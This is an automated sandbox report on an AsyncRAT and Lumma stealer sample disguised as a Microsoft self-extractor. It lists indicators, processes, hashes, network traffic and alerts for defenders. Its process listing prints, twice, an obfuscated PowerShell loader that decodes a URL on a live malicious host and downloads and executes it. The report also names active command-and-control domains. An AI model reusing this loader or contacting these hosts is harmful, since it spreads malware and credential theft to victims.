File name: FdqlBTs.exe

Full analysis: https://app.any.run/tasks/cf888072-d998-4ae8-b5b9-a0cad8a418bd
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on GitHub as legitimate open-source remote administration software, but attackers use it for its many powerful malicious functions.

Analysis date: March 24, 2025, 21:03:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
stegocampaign
stealer
lumma
rat
asyncrat
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5: 1B129D080655A4C9F703A5DCE0195512
SHA1: 9EC187C55FC3F50D98C372A96913FD38462C4EBF
SHA256: EE5C9B3DC922C0D16FD7A1E1D72C3530F9AEE1209A233764F8280EE7DBC3B353
SSDEEP: 6144:Po1GDF7f25lw/lJj2LnT25qndIjjVV8qtynD:Po1G57u5lw/qLnT25qndIPVVRtyD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 8048)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Gets information about running processes via WMI (SCRIPT)

      • wscript.exe (PID: 7380)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 7344)
    • ASYNCRAT has been detected (SURICATA)

      • powershell.exe (PID: 7372)
    • Connects to the CnC server

      • powershell.exe (PID: 7372)
    • Executes an application with conhost.exe as parent process

      • powershell.exe (PID: 7372)
    • LUMMA mutex has been found

      • RegAsm.exe (PID: 7344)
    • Actions look like stealing of personal data

      • RegAsm.exe (PID: 7344)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • FdqlBTs.exe (PID: 7704)
    • Executing commands from a ".bat" file

      • FdqlBTs.exe (PID: 7704)
    • Starts a Microsoft application from unusual location

      • FdqlBTs.exe (PID: 7704)
    • Starts CMD.EXE for commands execution

      • FdqlBTs.exe (PID: 7704)
    • Uses WMIC.EXE to obtain CPU information

      • cmd.exe (PID: 7724)
    • Gets information on the list of running processes

      • powershell.exe (PID: 7944)
    • Application launched itself

      • powershell.exe (PID: 7944)
    • Probably downloads files using WebClient

      • powershell.exe (PID: 7944)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7944)
      • conhost.exe (PID: 7276)
      • cmd.exe (PID: 7724)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7944)
    • Executed via WMI

      • conhost.exe (PID: 7276)
    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 7380)
    • The process executes JS scripts

      • cmd.exe (PID: 7724)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 7372)
    • There is functionality for taking screenshot (YARA)

      • RegAsm.exe (PID: 7344)
    • Searches for installed software

      • RegAsm.exe (PID: 7344)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7724)
  • INFO

    • The sample was compiled with English language support

      • FdqlBTs.exe (PID: 7704)
    • Checks supported languages

      • FdqlBTs.exe (PID: 7704)
      • RegAsm.exe (PID: 7344)
    • Creates files in a temporary directory

      • FdqlBTs.exe (PID: 7704)
      • powershell.exe (PID: 8048)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7780)
      • powershell.exe (PID: 8048)
    • Reads the software policy settings

      • powershell.exe (PID: 8048)
      • RegAsm.exe (PID: 7344)
      • slui.exe (PID: 5800)
    • Checks proxy server information

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
      • slui.exe (PID: 5800)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8048)
    • Disables trace logs

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7372)
    • Reads the computer name

      • RegAsm.exe (PID: 7344)
    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 7344)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7372)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7944)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7944)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7944)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2090:06:11 09:36:52+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.26
CodeSize: 32768
InitializedDataSize: 163840
UninitializedDataSize: -
EntryPoint: 0x8460
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.20348.1
ProductVersionNumber: 11.0.20348.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.20348.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.20348.1
No data.
All screenshots are available in the full report
Total processes: 137
Monitored processes: 14
Malicious processes: 7
Suspicious processes: 1

Behavior graph

  • start
  • fdqlbts.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • wmic.exe (no specs)
  • find.exe (no specs)
  • powershell.exe (no specs)
  • #STEGOCAMPAIGN powershell.exe
  • svchost.exe
  • regasm.exe (no specs)
  • #LUMMA regasm.exe
  • wscript.exe (no specs)
  • conhost.exe (no specs)
  • #ASYNCRAT powershell.exe
  • slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 5800
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7276
CMD: conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
Path: C:\Windows\System32\conhost.exe
Parent process: WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7288
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
PID: 7344
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
PID: 7372
CMD: powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 7380
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js"
Path: C:\Windows\System32\wscript.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
PID: 7704
CMD: "C:\Users\admin\Desktop\FdqlBTs.exe"
Path: C:\Users\admin\Desktop\FdqlBTs.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Win32 Cabinet Self-Extractor
Exit code:
0
Version:
11.00.20348.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\fdqlbts.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 7724
CMD: cmd.exe /c 1.bat && 2.js
Path: C:\Windows\System32\cmd.exe
Parent process: FdqlBTs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
PID: 7732
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 24 012
Read events: 24 010
Write events: 2
Delete events: 0

Modification events

(PID) Process: (7724) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation: write
Name: JSFile
Value:

(PID) Process: (7380) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: F220110000000000
Executable files: 0
Suspicious files: 2
Text files: 9
Unknown types: 0

Dropped files

PID | Process | Filename | Type
8048 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzsu14x4.mzs.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1gptron2.3gh.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pbwasygv.qvs.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8048 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: B0B20017EB93C725F3360526BC24E47F
SHA256: E82557A4BBD0FCB4AF179600AFB1B5B530EE153FF4354FA7BAC301509B083441
7704 | FdqlBTs.exe | C:\Users\admin\AppData\Local\Temp\IXP000.TMP\1.bat | text
MD5: F6A8B35F102210019DCE8177B1DF901C
SHA256: 1F0AEE2640D4748C088BD4AA0B8BEF5323ADD0778731FDFD3FA4D12ADDA1487B
7372 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v0zsuqdb.dod.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7372 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sijntjuw.pqc.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yqrh2jj5.0u5.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7704 | FdqlBTs.exe | C:\Users\admin\AppData\Local\Temp\IXP000.TMP\2.js | binary
MD5: FAE294BEEEA146FCC79C6BA258159550
SHA256: 0DB879398B091AAA19FE58C398B589C47A9E78194600CFDFF150C50F4EF40E31
8048 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_klz5xj50.c2l.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 14
TCP/UDP connections: 29
DNS requests: 12
Threats: 6

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
6392 | RUXIMICS.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | unknown
7372 | powershell.exe | GET | 200 | 2.58.15.254:80 | http://baredaseco.pro/1.php?s=flibabc11 | unknown | - | - | unknown
7372 | powershell.exe | GET | 302 | 185.250.151.155:80 | http://ebmmnhkldkhdlbk.top/bn68qiewjfhtr.php?id=DESKTOP-JGLLJLD&key=74532125735&s=flibabc11 | unknown | - | - | unknown
- | - | GET | 200 | 192.96.205.175:443 | https://shivalikhyundai.co.in/images/cdghaah.txt | unknown | text | 492 Kb | unknown
- | - | GET | 200 | 185.199.110.153:443 | https://ofice365.github.io/1/test.jpg | unknown | image | 5.48 Mb | unknown
- | - | POST | 200 | 104.21.78.80:443 | https://soliduso.digital/QUDis | unknown | binary | 68 b | unknown
- | - | POST | 200 | 172.67.218.154:443 | https://soliduso.digital/QUDis | unknown | binary | 68 b | unknown
- | - | POST | 200 | 104.21.78.80:443 | https://soliduso.digital/QUDis | unknown | binary | 68 b | unknown
- | - | POST | 200 | 172.67.218.154:443 | https://soliduso.digital/QUDis | unknown | binary | 43 b | unknown
- | - | POST | 200 | 172.67.218.154:443 | https://soliduso.digital/QUDis | unknown | binary | 32.9 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
6392 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:137 | - | - | - | unknown
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:138 | - | - | - | unknown
6392 | RUXIMICS.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | unknown
8048 | powershell.exe | 185.199.108.153:443 | ofice365.github.io | FASTLY | US | unknown
8048 | powershell.exe | 192.96.205.175:443 | shivalikhyundai.co.in | LEASEWEB-USA-WDC | US | unknown
7344 | RegAsm.exe | 172.67.218.154:443 | soliduso.digital | CLOUDFLARENET | US | unknown
7372 | powershell.exe | 2.58.15.254:80 | baredaseco.pro | ASN-QUADRANET-GLOBAL | NL | unknown
7372 | powershell.exe | 185.250.151.155:80 | ebmmnhkldkhdlbk.top | MIRholding B.V. | US | unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
unknown
google.com
  • 216.58.206.78
unknown
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
unknown
ofice365.github.io
  • 185.199.108.153
  • 185.199.109.153
  • 185.199.110.153
  • 185.199.111.153
unknown
shivalikhyundai.co.in
  • 192.96.205.175
unknown
soliduso.digital
  • 172.67.218.154
  • 104.21.78.80
unknown
baredaseco.pro
  • 2.58.15.254
unknown
ebmmnhkldkhdlbk.top
  • 185.250.151.155
unknown
4xqqasqjdti51qa.com
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
unknown

Threats

PID | Process | Class | Message
7372 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
2196 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile
7372 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain
7372 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
7372 | powershell.exe | Malware Command and Control Activity Detected | ET MALWARE AsyncRAT Victim Checkin
1 ETPRO signature is available in the full report
No debug info